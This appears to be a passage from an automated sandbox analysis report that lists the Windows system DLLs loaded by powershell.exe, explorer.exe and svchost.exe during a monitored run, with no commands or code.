Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
